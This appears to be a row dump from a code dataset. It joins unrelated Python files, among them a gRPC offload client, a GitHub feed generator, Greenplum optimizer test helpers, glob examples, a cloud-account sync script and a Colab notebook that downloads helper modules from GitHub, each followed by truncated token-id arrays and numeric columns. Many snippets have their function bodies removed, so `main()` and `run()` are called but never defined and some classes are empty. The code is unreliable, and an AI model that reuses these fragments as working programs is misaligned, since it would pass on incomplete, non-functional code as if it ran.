19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
37811,
9126,
12,
5715,
5301,
329,
367,
928,
2416,
372,
526,
15931,
198,
198,
834,
9800,
834,
796,
37227,
38,
385,
30833,
37811,
198,
834,
12888,
834,
796,
705,
86... | 2.202899 | 69 |
#============LICENSE_START=============================================================================================================
# Copyright (C) 2020 AT&T Intellectual Property. All rights reserved.
#===================================================================
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#============LICENSE_END===============================================================================================================
from __future__ import print_function
import random
import logging
import socket
import struct
import sys
import grpc
import openoffload_pb2
import openoffload_pb2_grpc
class Sessions:
'''
'''
def __iter__(self):
''' Returns the Iterator object '''
return SessionsIterator(self)
class SessionsIterator:
''' Iterator class '''
def __next__(self):
''''Returns the next value from team object's lists '''
if self._index < (len(self._session_list._sessions) ) :
result = (self._session_list._sessions[self._index])
self._index +=1
return result
# End of Iteration
raise StopIteration
if __name__ == '__main__':
logging.basicConfig()
run()
| [
2,
25609,
43,
2149,
24290,
62,
2257,
7227,
23926,
10052,
25609,
28,
198,
2,
15069,
357,
34,
8,
12131,
5161,
5,
51,
42443,
14161,
13,
1439,
2489,
10395,
13,
198,
2,
23926,
18604,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,... | 3.611465 | 471 |
from dlutils.models.gans.gan.gan import GenerativeAdversarialNetworks, \
update_fn
| [
6738,
288,
75,
26791,
13,
27530,
13,
39352,
13,
1030,
13,
1030,
1330,
2980,
876,
2782,
690,
36098,
7934,
5225,
11,
3467,
198,
220,
220,
220,
4296,
62,
22184,
198
] | 2.9 | 30 |
# -*- coding: utf-8 -*-
from datetime import datetime
import requests
from werkzeug.contrib.atom import AtomFeed
ENDPOINT = "https://api.github.com/users/{username}/received_events"
TITLE = "{username}'s github timeline"
SUBTITLE = "Timeline as of {date}"
AUTHOR = "{}'s github"
FEED_TITLE = "{} {} {}"
URL = "https://github.com/{}"
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
6738,
4818,
8079,
1330,
4818,
8079,
198,
11748,
7007,
198,
6738,
266,
9587,
2736,
1018,
13,
3642,
822,
13,
37696,
1330,
33102,
18332,
628,
198,
1677,
6322,
46,
12394,
79... | 2.688 | 125 |
"""
Copyright (C) 2004-2015 Pivotal Software, Inc. All rights reserved.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import tinctest
from tinctest.lib import run_shell_command
from mpp.models import SQLPerformanceTestCase
from mpp.models.sql_tc import _SQLTestCaseResult
from mpp.lib.PSQL import PSQL
import unittest2 as unittest
import fnmatch
import hashlib
import os
import socket
import shutil
import sys
from xml.dom import minidom
_DEFAULT_LOOKUP_FILE = os.path.join(os.environ["TINCHOME"], 'function_owners.csv')
@tinctest.skipLoading("Test model. No tests loaded.")
class OptimizerSQLPerformanceTestCase(SQLPerformanceTestCase):
"""
Inherits from SQLPerformanceTestCase and runs a performance test with additional optimizer gucs
"""
def _add_gucs_to_sql_file(self, sql_file, gucs_sql_file=None, optimizer=None):
"""
Form test sql file by adding the defined gucs to the sql file
@param sql_file Path to the test sql file
@returns Path to the modified sql file
"""
ignore_gucs = False
if not gucs_sql_file:
gucs_sql_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file))
if 'setup.sql' in gucs_sql_file or 'teardown.sql' in gucs_sql_file:
shutil.copyfile(sql_file, gucs_sql_file)
return gucs_sql_file
# gucs_sql_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '_gucs.sql'))
with open(gucs_sql_file, 'w') as o:
with open(sql_file, 'r') as f:
# We make a dirty assumption that there is only one valid query block
# in the sql file as in many other places. We have to re-visit this
# when we tackle handling of multiple queries in a SQL file
query_string = ''
for line in f:
if (line.find('--') != 0):
query_string += line
f.seek(0)
for line in f:
if (line.find('--') != 0):
break
else:
o.write(line)
o.write('\n\n-- start_ignore\n')
# Add gucs and then add the line
for guc_string in self.gucs:
o.write("SET %s;\n" %guc_string)
for orca_guc_string in self.orcagucs:
o.write("%s;\n"%orca_guc_string)
# Add explain of query to load optimizer libraries and md cache- QAINF-418
# Note - Assuming just one valid query block
# o.write("select disable_xform('CXformInnerJoin2IndexApply');\n")
o.write('--Add explain of query to load optimizer libraries\n')
o.write('EXPLAIN \n %s\n\n' %query_string.strip())
o.write('\\timing on\n')
o.write('-- end_ignore\n\n')
for line in f:
o.write(line)
self.test_artifacts.append(gucs_sql_file)
return gucs_sql_file
#self.gucs.add('optimizer_damping_factor_join = 1')
class OptStacktrace(object):
"""
Given a minidump or a text containing stack trace, this parses the stacktrace element from the mini-dump / text and parses the stack trace into an object.
"""
def __init__(self):
"""
Initialize parser.
"""
self.binary = 'postgres'
self.threads = []
self.text = ''
@classmethod
def parse(cls, type, dxl = None, text = None):
"""
Parse stack trace from a minidump or a text and return a
OptStacktrace object
@param type - 'dxl' or 'text' specifying where to look for a stack trace
@param dxl - location of the dxl file
@param text - string containing a stack trace
"""
if type != 'dxl' and type != 'text':
tinctest.logger.warning("Unknown source type %s. Returning no stack." %(type))
return None
if type == 'dxl':
return cls._parse_dxl_for_stack_trace(dxl)
if type == 'text':
return cls._parse_text_for_stack_trace(text)
@classmethod
def get_thread(self, number):
"""
Given a thread number, returns the corresponding OptSTacktraceThread object
"""
for thread in self.threads:
if thread.number == number:
return thread
return None
class OptStacktraceThread(object):
"""
Class representing one thread of a stack trace. Contains a list of OptStackFrame objects.
"""
@classmethod
def parse(cls, text, number):
"""
Parse a single thread's stack trace text and returns an OptStacktraceThread object
"""
thread = OptStacktraceThread()
thread.number = number
thread.text = text
# Get every line in the text and form a frame object
for line in text.splitlines():
thread.frames.append(OptStackFrame.parse(line))
return thread
def get_first_relevant_frame(self):
"""
Returns the first relevant frame in the stack trace. Relevance
here means the first non-gpos stack frame. We should refine this
when we encounter special cases. For the following stack:
1 0x000000000132f465 gpos::CException::Raise + 165
2 0x0000000001b9f148 gpdxl::CDXLUtils::PphdxlParseDXLFile + 888
3 0x000000000035450d COptTasks::PdrgPssLoad + 61,
this should return the second frame
"""
ret = False
for frame in self.frames:
if ret == True:
return frame
if 'gpos' in frame.function:
ret = True
# This means there was no frame with gpos functions and we return None
return None
def hash(self, number_of_frames):
"""
Return a hash of the top 'number_of_frames' of the stack trace.
"""
if len(self.frames) < number_of_frames:
number_of_frames = len(self.frames)
m = hashlib.md5()
for i in xrange(number_of_frames):
m.update(self.frames[i].text)
return m.hexdigest()
class OptStackFrame(object):
"""
Single stack frame element representing a single function call in a stack.
Each frame is assumed to be of the following format:
1 0x000000000132f465 gpos::CException::Raise + 165
"""
@classmethod
def parse(cls, text):
"""
Given a single line of stack trace, parses the string and returns an OptStackFrame object
"""
frame = OptStackFrame()
frame.text = text
frame_elements = text.split()
# Assuming the following format
# "1 0x000000000132f465 gpos::CException::Raise + 165""
# TODO - Check if we will have other formats
frame.function = frame_elements[2]
frame.number = int(frame_elements[0])
frame.address = frame_elements[1]
frame.line = int(frame_elements[4])
return frame
def get_owner(self, lookup_file = _DEFAULT_LOOKUP_FILE):
"""
By default, find the owner from a lookup file at function_owners.csv in $GPHOME/bin
"""
if self.function in self._owner_cache:
return self._owner_cache[self.function]
if not os.path.exists(lookup_file):
tinctest.logger.warning("Lookup file does not exist - " + lookup_file)
return ''
with open(lookup_file, 'r') as f:
for line in f:
fields = line.split(',')
owner = fields[2].strip()
function = fields[1].strip()
# Note that we also add the default namespace 'gpopt::' while looking up function_owners.csv
# because complexity.csv does not include namespace for functions in .cpp files.
if self.function == function or self.function == 'gpopt::' + function or self.function == 'gpdxl::' + function:
self._owner_cache[self.function] = owner
return owner.strip()
tinctest.logger.warning("Did not find function %s in the lookup file %s " %(self.function, lookup_file))
return ''
class OptimizerTestResult(_SQLTestCaseResult):
"""
A listener for OptimizerSQLTestCase that will collect mini dumps when a test case fails
"""
def addFailure(self, test, err):
"""
Collect mini dumps for test queries during a failure
"""
dxl_file = test._collect_mini_dump()
super(OptimizerTestResult, self).addFailure(test, err)
| [
37811,
198,
15269,
357,
34,
8,
5472,
12,
4626,
350,
452,
4997,
10442,
11,
3457,
13,
1439,
2489,
10395,
13,
198,
198,
1212,
1430,
290,
262,
19249,
5696,
389,
925,
1695,
739,
198,
1169,
2846,
286,
262,
739,
262,
24843,
13789,
11,
1062... | 2.335104 | 3,954 |
# -*- coding:utf-8 -*-
import glob
# 获取指定目录下的内容
# yijian = glob.glob(r"F:\*\*\*.docx")
# print(yijian)
"""
在python中,glob模块是用来查找匹配的文件的
在查找的条件中,需要用到Unix shell中的匹配规则:
* : 匹配所有
? : 匹配一个字符
*.* : 匹配如:[hello.txt,cat.xls,xxx234s.doc]
?.* : 匹配如:[1.txt,h.py]
?.gif: 匹配如:[x.gif,2.gif]
如果没有匹配的,glob.glob(path)将返回一个空的list:[]
"""
def get_all():
""" 获取目录下面所有的文件 """
return glob.glob(r"F:\PythonProject\*.*")
def get_myfile():
"""获取文件名为6个字符的文件"""
return glob.glob(r"F:\PythonProject\??????.txt")
def getsubfile():
"""获取子目录下的文件"""
return glob.glob(r"F:\PythonProject\*\*\**.txt")
if __name__=="__main__":
main() | [
2,
532,
9,
12,
19617,
25,
40477,
12,
23,
532,
9,
12,
198,
198,
11748,
15095,
198,
198,
2,
5525,
236,
115,
20998,
244,
162,
234,
229,
22522,
248,
33566,
106,
37605,
243,
10310,
233,
21410,
37863,
227,
22522,
117,
198,
2,
331,
2926,... | 1.243292 | 559 |
import numpy as np
'''
Problem 1.2
'''
'''
Problem 1.2
'''
'''
Problem 1.8
'''
| [
11748,
299,
32152,
355,
45941,
628,
198,
7061,
6,
198,
40781,
352,
13,
17,
198,
7061,
6,
198,
198,
7061,
6,
198,
40781,
352,
13,
17,
198,
7061,
6,
198,
198,
7061,
6,
198,
40781,
352,
13,
23,
198,
7061,
6,
628
] | 2 | 42 |
from instruction.event import _Instruction
from instruction.entity import *
CAMERA, PARTY0, PARTY1, PARTY2, PARTY3 = range(0x30, 0x35)
| [
6738,
12064,
13,
15596,
1330,
4808,
6310,
2762,
198,
6738,
12064,
13,
26858,
1330,
1635,
198,
198,
34,
2390,
46461,
11,
16652,
56,
15,
11,
16652,
56,
16,
11,
16652,
56,
17,
11,
16652,
56,
18,
796,
2837,
7,
15,
87,
1270,
11,
657,
... | 2.833333 | 48 |
import os
from .storage import Storage
| [
11748,
28686,
198,
198,
6738,
764,
35350,
1330,
20514,
198
] | 4 | 10 |
from sdk.color_print import c_print
from cloud_accounts import cld_migrate, cld_get, cld_compare, cld_update, cld_delete
def sync(tenant_sessions: list, addMode: bool, upMode: bool, delMode: bool, logger:object):
'''Update, add, or delete cloud accounts to normalize all tenants to be the same as the source tenant'''
added_cloud = []
updated_cloud = []
deleted_cloud = []
if addMode:
#Migrate missing cloud accounts first using migrate module
added_cloud = cld_migrate.migrate(tenant_sessions, logger)
if upMode or delMode:
#Get all cloud accounts from both tenants
tenant_accounts = []
for i in range(len(tenant_sessions)):
accounts = cld_get.get_names(tenant_sessions[i], logger)
tenant_accounts.append(accounts)
#Get the full information for each cloud account
tenants_cloud_accounts = []
for i in range(len(tenant_accounts)):
cloud_accounts_to_upload = []
for j in range(len(tenant_accounts[i])):
account = tenant_accounts[i][j]
ret = cld_get.get_all_info(tenant_sessions[i], account, logger)#get info from original tenant
if ret != '':
cloud_accounts_to_upload.append(ret)
tenants_cloud_accounts.append(cloud_accounts_to_upload)
#Sync each tenants cloud accounts
source_tenant_cloud_accounts = tenants_cloud_accounts[0]
clone_tenants_cloud_accounts = tenants_cloud_accounts[1:]
cln_tenant_sessions = tenant_sessions[1:]
for index in range(len(clone_tenants_cloud_accounts)):
if upMode:
accounts_to_update = cld_compare.get_accounts_to_update(source_tenant_cloud_accounts, clone_tenants_cloud_accounts[index], tenant_sessions[0], cln_tenant_sessions[index], logger)
updated = cld_update.update_accounts(cln_tenant_sessions[index], accounts_to_update, logger)
updated_cloud.append(updated)
if delMode:
accounts_to_delete = cld_compare.get_accounts_to_delete(source_tenant_cloud_accounts, clone_tenants_cloud_accounts[index])
deleted = cld_delete.delete_accounts(cln_tenant_sessions[index], accounts_to_delete, logger)
deleted_cloud.append(deleted)
else:
deleted_cloud.append(0)
return added_cloud, updated_cloud, deleted_cloud, {}
if __name__ == '__main__':
from sdk import load_config
#Generate a API session for each tenant
tenant_sessions = load_config.load_config_create_sessions()
sync(tenant_sessions, True, True, True)
| [
6738,
264,
34388,
13,
8043,
62,
4798,
1330,
269,
62,
4798,
198,
6738,
6279,
62,
23317,
82,
1330,
269,
335,
62,
76,
42175,
11,
269,
335,
62,
1136,
11,
269,
335,
62,
5589,
533,
11,
269,
335,
62,
19119,
11,
269,
335,
62,
33678,
198... | 2.32526 | 1,156 |
from darwinian_shift.utils.gene_sequence_functions import *
from tests.conftest import EXON_FILE, REFERENCE_FASTA_FILE
import pickle
import os
import numpy as np
from pandas.testing import assert_frame_equal
import pytest
FILE_DIR = os.path.dirname(os.path.realpath(__file__))
@pytest.mark.parametrize("gene,transcript",[("KEAP1", None), (None, "ENST00000171111")])
| [
6738,
288,
283,
5404,
666,
62,
30846,
13,
26791,
13,
70,
1734,
62,
43167,
62,
12543,
2733,
1330,
1635,
198,
6738,
5254,
13,
1102,
701,
395,
1330,
7788,
1340,
62,
25664,
11,
4526,
24302,
18310,
62,
37,
1921,
5603,
62,
25664,
198,
117... | 2.761194 | 134 |
for _ in range(int(input())):
n = int(input())
s = input()
alpha = set(s)
ans = n
countImpossible = 0
for i in alpha:
curr = 0
lb, ub = 0, n - 1
while lb < ub:
if s[lb] == s[ub]:
lb += 1
ub -= 1
continue
else:
if s[lb] == i:
lb += 1
curr += 1
continue
elif s[ub] == i:
ub -= 1
curr += 1
continue
else:
curr = n + 1
lb += 1
ub -= 1
continue
dup = s
dup = dup.replace(i, '')
if dup != dup[::-1]:
countImpossible += 1
ans = min(ans, curr)
if countImpossible == len(alpha):
ans = -1
print(ans) | [
1640,
4808,
287,
2837,
7,
600,
7,
15414,
28955,
2599,
198,
220,
220,
220,
299,
796,
493,
7,
15414,
28955,
198,
220,
220,
220,
264,
796,
5128,
3419,
198,
220,
220,
220,
17130,
796,
900,
7,
82,
8,
198,
220,
220,
220,
9093,
796,
29... | 1.515702 | 605 |
'''
Uses [[https://github.com/karlicoss/HPI][HPI]] dogsheep module to import
Hacker News items.
'''
import textwrap
from promnesia.common import Visit, Loc, Results
| [
7061,
6,
198,
5842,
274,
16410,
5450,
1378,
12567,
13,
785,
14,
21070,
677,
793,
14,
39,
11901,
7131,
39,
11901,
11907,
6844,
258,
538,
8265,
284,
1330,
198,
39,
10735,
3000,
3709,
13,
198,
7061,
6,
198,
198,
11748,
2420,
37150,
198... | 3 | 56 |
from dataclasses import dataclass, field
from typing import List, Dict, Any, Tuple
from yamldataclassconfig.config import YamlDataClassConfig
@dataclass
@dataclass
@dataclass
@dataclass
@dataclass
@dataclass
@dataclass
| [
6738,
4818,
330,
28958,
1330,
4818,
330,
31172,
11,
2214,
198,
6738,
19720,
1330,
7343,
11,
360,
713,
11,
4377,
11,
309,
29291,
198,
198,
6738,
331,
321,
335,
265,
330,
31172,
11250,
13,
11250,
1330,
14063,
75,
6601,
9487,
16934,
628,... | 2.785714 | 84 |
import logging
import numpy
from PIL import Image
from dirs import dest
log = logging.getLogger()
| [
11748,
18931,
198,
198,
11748,
299,
32152,
198,
6738,
350,
4146,
1330,
7412,
198,
6738,
288,
17062,
1330,
2244,
198,
6404,
796,
18931,
13,
1136,
11187,
1362,
3419,
628,
198
] | 3.366667 | 30 |
from flask import request, jsonify
from app import app, db
from app.models import Subject, SubjectSchema, SubjectsSchema
@app.route('/subjects', methods=['get'])
@app.route('/subjects', methods=['post'])
| [
6738,
42903,
1330,
2581,
11,
33918,
1958,
198,
6738,
598,
1330,
598,
11,
20613,
198,
6738,
598,
13,
27530,
1330,
15540,
11,
15540,
27054,
2611,
11,
43815,
27054,
2611,
198,
198,
31,
1324,
13,
38629,
10786,
14,
32796,
82,
3256,
5050,
2... | 3.21875 | 64 |
#----------------------------------------------
# Teste de cálculo e tomada de decisão
#
# Conceito A = nota >= 9 and < 10
# Conceito B = nota >= 8 and 8,99999
# Conceito C = nota >= 7 and 7,99999
# Conceito D = nota >= 6 and 6,99999
# Conceito R = nota < 5
#
#----------------------------------------------
import os
from termcolor import colored
main() | [
198,
2,
3880,
26171,
198,
2,
6208,
68,
390,
269,
6557,
75,
3129,
78,
304,
16667,
4763,
390,
875,
271,
28749,
198,
2,
198,
2,
44530,
10094,
317,
796,
407,
64,
18189,
860,
290,
1279,
838,
198,
2,
44530,
10094,
347,
796,
407,
64,
1... | 3.256881 | 109 |
import pytest
from briefcase.commands import NewCommand
from briefcase.commands.base import full_kwargs
class DummyNewCommand(NewCommand):
"""
A dummy new command that doesn't actually do anything.
It only serves to track which actions would be performend.
"""
description = 'Dummy new command'
@pytest.fixture
| [
11748,
12972,
9288,
198,
198,
6738,
4506,
7442,
13,
9503,
1746,
1330,
968,
21575,
198,
6738,
4506,
7442,
13,
9503,
1746,
13,
8692,
1330,
1336,
62,
46265,
22046,
628,
198,
4871,
360,
13513,
3791,
21575,
7,
3791,
21575,
2599,
198,
220,
... | 3.326733 | 101 |
from ma import ma
from models.category import CategoryModel
from schemas.market import MarketSchema
| [
6738,
17266,
1330,
17266,
198,
6738,
4981,
13,
22872,
1330,
21743,
17633,
198,
6738,
3897,
5356,
13,
10728,
1330,
5991,
27054,
2611,
198
] | 4.347826 | 23 |
# BSD 3-Clause License
#
# Copyright (c) 2020, Hyuk Ko
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import locBaker
reload(locBaker)
try:
lb.close()
lb.deleteLater()
except:
pass
lb = locBaker.LocBaker()
lb.show()
"""
try:
from PySide import QtGui, QtCore
import PySide.QtGui as QtWidgets
import shiboken
except ImportError:
from PySide2 import QtGui, QtCore, QtWidgets
import shiboken2 as shiboken
import maya.cmds as mc
import maya.OpenMaya as om
import maya.OpenMayaUI as omui
import traceback
from functools import wraps
# Decorator for undo support.
if __name__ == "__main__":
try:
lb.close()
lb.deleteLater()
except:
pass
lb = LocBaker()
lb.show()
| [
2,
347,
10305,
513,
12,
2601,
682,
13789,
198,
2,
198,
2,
15069,
357,
66,
8,
12131,
11,
6707,
2724,
17634,
198,
2,
1439,
2489,
10395,
13,
198,
2,
198,
2,
2297,
396,
3890,
290,
779,
287,
2723,
290,
13934,
5107,
11,
351,
393,
1231... | 3.079498 | 717 |
""" Stuff to generate and modify images """
# pylint: disable=line-too-long, logging-fstring-interpolation, dangerous-default-value, logging-not-lazy
from datetime import timedelta, datetime as dt
import sys
import glob
import logging
import argparse
from pathlib import Path
import os
from dateutil.rrule import rrule, SECONDLY
from PIL import Image, ImageColor, ImageDraw, ImageFont
from tmv.video import SliceType, VideoMaker
from tmv.util import LOG_FORMAT, LOG_LEVELS, dt2str, next_mark, prev_mark, strptimedelta
from tmv.config import FONT_FILE_IMAGE, HH_MM
LOGGER = logging.getLogger("tmv.images")
try:
from ascii_graph import Pyasciigraph # optional, for 'graph'
except ImportError as exc:
# print(exc)
pass
def stamp(filename, ith):
""" Draw a moving circle on the image for continuity in video checking """
assert os.path.exists(filename)
img = Image.open(filename)
draw = ImageDraw.Draw(img)
font = ImageFont.truetype(FONT_FILE_IMAGE, 20)
draw.pieslice([(0, 0), (100, 100)], ith % 360, ith % 360, fill=None, outline=None)
draw.arc([(0, 0), (100, 100)], 0, 360)
w, h = img.size
# draw.text(( (self.ith*10) % w, h - 10), "*", (255, 255, 255), font=font)
draw.text((w - 40, h - 40), str(ith), (255, 255, 255), font=font)
draw.text((w - 300, h - 60), filename, (255, 255, 255), font=font)
LOGGER.debug("Stamping: {} : {}x{}".format(filename, w, h))
img.save(filename, )
def rename_to_exif_datetime(filename, pattern="%Y-%m-%dT%H-%M-%S"):
""" Get the exif date and rename the file to a pattern based on that
Args:
filename (str): [description]
pattern (str, optional): Rename to this pattern with exif date
"""
dtt = exif_datetime_taken(filename)
date_filename = os.path.join(os.path.dirname(filename),
dtt.strftime(pattern) + os.path.splitext(filename)[1])
LOGGER.debug("Renaming {} to {}".format(filename, date_filename))
os.rename(filename, date_filename)
def graph_intervals(tl_videos, interval=timedelta(hours=1)):
"""
Plot ascii frequency of photos per bin
"""
bins = {}
for video in tl_videos:
# round bin start
start = prev_mark(interval, video.start)
end = next_mark(interval, video.end)
# generate a list of marks
video_extents = list(rrule(SECONDLY, dtstart=start, until=end, interval=int(interval.total_seconds())))
for bin_start in video_extents:
images_in_slice = [im for im in video.images if bin_start <= im.taken < bin_start + interval]
bins[bin_start] = len(images_in_slice)
graphable = []
for h in sorted(bins):
# print("{}:{}".format(h,freq[h]))
graphable.append(tuple((h.isoformat(), bins[h])))
# print (graphable)
graph = Pyasciigraph()
for line in graph.graph('Frequency per {}'.format(interval), graphable):
print(line)
class Overlay():
""" Put pixels on an image """
class Label(Overlay):
""" Write name of image on the bottom """
class CalenderOverlay(Overlay):
"""
Add an "+" on a 'calendar' graph:
D1, D2, D3 ... D365
H0
H1 +
H2
...
H23
"""
def generate_cal_cross_images(output=Path("."), period=timedelta(days=365), step=timedelta(hours=1)):
""" One per hour with a "x" and label"""
start = dt(2000, 1, 1, 0, 0, 0)
end = start + period
# generate marks at regular intervals
time_range = list(rrule(SECONDLY, dtstart=start, until=end, interval=int(step.total_seconds())))
for instant in time_range:
f = output / Path(dt2str(instant) + ".jpg")
im = Image.new("RGB", (320, 200))
overlay = CalenderOverlay(im, instant)
overlay.apply()
overlay = Label(im, str(f))
overlay.apply()
im.save(f)
im.close()
def exif_datetime_taken(fn):
"""returns the image date from image (if available)
https://orthallelous.wordpress.com/2015/04/19/extracting-date-and-time-from-images-with-python/"""
std_fmt = '%Y:%m:%d %H:%M:%S.%f'
# for subsecond prec, see doi.org/10.3189/2013JoG12J126 , sect. 2.2, 2.3
tags = [(36867, 37521), # (DateTimeOriginal, SubsecTimeOriginal)
(36868, 37522), # (DateTimeDigitized, SubsecTimeDigitized)
(306, 37520), ] # (DateTime, SubsecTime)
exif = Image.open(fn)._getexif() # pylint: disable=protected-access
print(exif)
for t in tags:
dat = exif.get(t[0])
subsub = exif.get(t[1], 0)
# PIL.PILLOW_VERSION >= 3.0 returns a tuple
dat = dat[0] if isinstance(dat,tuple) else dat
subsub = subsub[0] if isinstance(subsub, tuple) else subsub
if dat is not None:
break
if dat is None:
return None
full = '{}.{}'.format(dat, subsub)
T = dt.strptime(full, std_fmt)
#T = time.mktime(time.strptime(dat, '%Y:%m:%d %H:%M:%S')) + float('0.%s' % sub)
return T
# pylint: disable=dangerous-default-value,
| [
37811,
27864,
284,
7716,
290,
13096,
4263,
37227,
198,
2,
279,
2645,
600,
25,
15560,
28,
1370,
12,
18820,
12,
6511,
11,
18931,
12,
69,
8841,
12,
3849,
16104,
341,
11,
4923,
12,
12286,
12,
8367,
11,
18931,
12,
1662,
12,
75,
12582,
... | 2.338873 | 2,166 |
user = None | [
7220,
796,
6045
] | 3.666667 | 3 |
from .interval import Interval
from datetime import date, datetime
from .interval import Interval, SpikeStatus, ChannelType
| [
6738,
764,
3849,
2100,
1330,
4225,
2100,
198,
6738,
4818,
8079,
1330,
3128,
11,
4818,
8079,
198,
6738,
764,
3849,
2100,
1330,
4225,
2100,
11,
26309,
19580,
11,
11102,
6030,
628
] | 4.032258 | 31 |
import sys
from glyphview import ( GlyphView, GlyphScene, GlyphItem )
from PyQt4.QtGui import ( QApplication, QDialog, QPen, QBrush, QHBoxLayout,
QPushButton, QVBoxLayout, QGraphicsRectItem, QGraphicsSimpleTextItem,
QPixmap, QFileDialog, QPainter, QComboBox, QSpinBox )
from PyQt4.QtCore import ( QRectF, QString, QPointF, SIGNAL, SLOT, Qt, pyqtSlot, QSize)
from dialogs import ( centreTextLabelBelow )
import glyphdesigns as designs
#noinspection PyOldStyleClasses
# end class
# end def
if __name__ == "__main__":
main() # run the main application window | [
11748,
25064,
198,
198,
6738,
25874,
1177,
1330,
357,
27949,
746,
7680,
11,
27949,
746,
36542,
11,
27949,
746,
7449,
1267,
198,
198,
6738,
9485,
48,
83,
19,
13,
48,
83,
8205,
72,
1330,
357,
1195,
23416,
11,
1195,
44204,
11,
1195,
25... | 2.454545 | 253 |
from polyphony import testbench
@testbench
test()
| [
6738,
7514,
23021,
1330,
1332,
26968,
198,
198,
31,
9288,
26968,
198,
198,
9288,
3419,
198
] | 3.25 | 16 |
tabuada = int(input('Qual tabuada queres saber?: '))
for cont in range(0, 11):
print('{} x {} = {}'.format(tabuada,cont,tabuada*cont))
| [
8658,
84,
4763,
796,
493,
7,
15414,
10786,
46181,
7400,
84,
4763,
8358,
411,
17463,
263,
27514,
705,
4008,
201,
198,
1640,
542,
287,
2837,
7,
15,
11,
1367,
2599,
201,
198,
220,
220,
220,
3601,
10786,
90,
92,
2124,
23884,
796,
23884,... | 2.366667 | 60 |
from collections import Counter
import webcolors
CSS3_COLORS = webcolors.CSS3_NAMES_TO_HEX.keys()
| [
6738,
17268,
1330,
15034,
198,
198,
11748,
3992,
4033,
669,
628,
198,
49155,
18,
62,
25154,
20673,
796,
3992,
4033,
669,
13,
49155,
18,
62,
45,
29559,
62,
10468,
62,
39,
6369,
13,
13083,
3419,
628,
628
] | 2.810811 | 37 |
from . import base as baseline
from . import conf_proposal
from . import conf_proposal_patch
configurations = {}
configurations['baseline'] = baseline
configurations['conf_proposal'] = conf_proposal
configurations['conf_proposal_patch'] = conf_proposal_patch
| [
6738,
764,
1330,
2779,
355,
14805,
198,
6738,
764,
1330,
1013,
62,
1676,
40007,
198,
6738,
764,
1330,
1013,
62,
1676,
40007,
62,
17147,
628,
198,
11250,
20074,
796,
23884,
198,
198,
11250,
20074,
17816,
12093,
4470,
20520,
796,
14805,
1... | 3.589041 | 73 |
#!/usr/bin/env python
# coding: utf-8
# # Analyzer
#
# Statistically, visually, and through machine learning compare mRNA and lncRNA sequences from GENCODE v38.
#
# Assume the user downloaded files from GENCODE v38 [FTP](http://ftp.ebi.ac.uk/pub/databases/gencode/Gencode_human/release_38/)
# to a subdirectory called data.
# ## Import Dependencies
#
# In[2]:
import numpy as np
import matplotlib.pyplot as plt
import random
import pandas as pd
import gzip
from scipy.stats import chisquare, kstest
import sys
from sklearn.utils import shuffle
from sklearn.model_selection import KFold
from sklearn.model_selection import cross_val_score
from sklearn.metrics import roc_curve
from sklearn.metrics import roc_auc_score
from keras.models import Sequential
from keras.layers import Dense,Embedding,Dropout
from keras.layers import Flatten,TimeDistributed
from keras.losses import BinaryCrossentropy
from keras.callbacks import ModelCheckpoint
from keras.models import load_model
try:
from google.colab import drive
IN_COLAB = True
print("On Google CoLab, mount cloud-local file, get our code from GitHub.")
PATH='/content/drive/'
#drive.mount(PATH,force_remount=True) # hardly ever need this
drive.mount(PATH) # Google will require login credentials
DATAPATH=PATH+'My Drive/data/' # must end in "/"
import requests
s = requests.get('https://raw.githubusercontent.com/ShepherdCode/Soars2021/master/SimTools/RNA_describe.py')
with open('RNA_describe.py', 'w') as f:
f.write(s.text) # writes to cloud local, delete the file later?
s = requests.get('https://raw.githubusercontent.com/ShepherdCode/Soars2021/master/SimTools/GenCodeTools.py')
with open ('GenCodeTools.py', 'w') as f:
f.write(s.text)
s = requests.get('https://raw.githubusercontent.com/ShepherdCode/Soars2021/master/SimTools/plot_generator.py')
with open('plot_generator.py', 'w') as f:
f.write(s.text)
s = requests.get('https://raw.githubusercontent.com/ShepherdCode/Soars2021/master/SimTools/KmerTools.py')
with open('KmerTools.py', 'w') as f:
f.write(s.text)
